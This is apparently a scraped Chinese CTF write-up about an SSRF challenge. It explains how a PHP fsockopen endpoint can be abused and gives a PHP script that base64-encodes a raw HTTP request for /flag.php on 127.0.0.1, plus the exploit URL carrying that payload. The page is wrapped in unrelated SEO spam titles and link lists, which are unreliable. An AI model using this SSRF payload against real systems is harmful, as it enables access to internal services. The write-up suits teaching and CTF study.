当前位置: 首页 > news >正文

包头做网站的工程备案信息查询

包头做网站的,工程备案信息查询,一个人在线观看免费中文,就业服务网站建设方案这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察 本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 bas…

这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察

本题是需要我们去伪造一个ssrf的请求头去绕过

题目开始给了我们信息让我们去访问index.php

fsockopen函数触发ssrf

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

通过了解知道fsockopen函数就要清楚有考察ssrf的意思,需要往这个方向去想

之后就是利用poc构建脚本

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80

之后就是构建url

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

用base64加密然后构建url编码

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

http://www.yayakq.cn/news/728743/

相关文章:

  • 网站开发 商城开发网页素材html
  • 重庆神态网站建设宁波seo外包优化
  • 中国建设银行官方网站诚聘英才个人网站怎么建设
  • 网站聊天代码有限责任公司属于什么单位性质
  • 培训教育行业网站建设方案wordpress登录安全插件下载
  • 网站换程序301dw网页制作考试题目
  • 阅读小说网站建设wordpress模板编写
  • 做网赌需要在哪些网站投广告八喜网站建设
  • 网站建设七点沈阳网站建设 熊掌号
  • 医院网站管理系统平面设计教程网站有哪些
  • 网站申请界面怎么做几十张照片合成视频
  • 营销型网站优化电子商务公司网站设计
  • 作风建设网站首页网站高端建设开发公司
  • 青岛做外贸网站包头市
  • 建立站点的基本步骤手表网站十大品牌
  • 临汾推广型网站开发wordpress怎么和手机连接数据库
  • 男女做那个的视频网站做影视后期应该关注哪些网站
  • 网站建设实践报告富阳网站优化
  • 互联网网站排名深圳品牌营销咨询公司
  • 网站开发空间小wordpress 插件 下载
  • 网站优化效果查询防做电脑租赁网站
  • 网站备案查询工信部ui界面图标
  • 做网站的能赚多少钱网站备案的要求
  • 网站制作 杭州wordpress小工具怎么调整漂亮
  • 企业网站推广的方法租用服务器
  • 建设部网站注册人员手机端怎么看世界杯
  • 手机版网站开发公司首页关键词排名优化
  • 制作网站软件下载青岛永诚网络有限公司
  • 福建省城乡建设网站六安网红
  • 常州企业自助建站网站推广阶段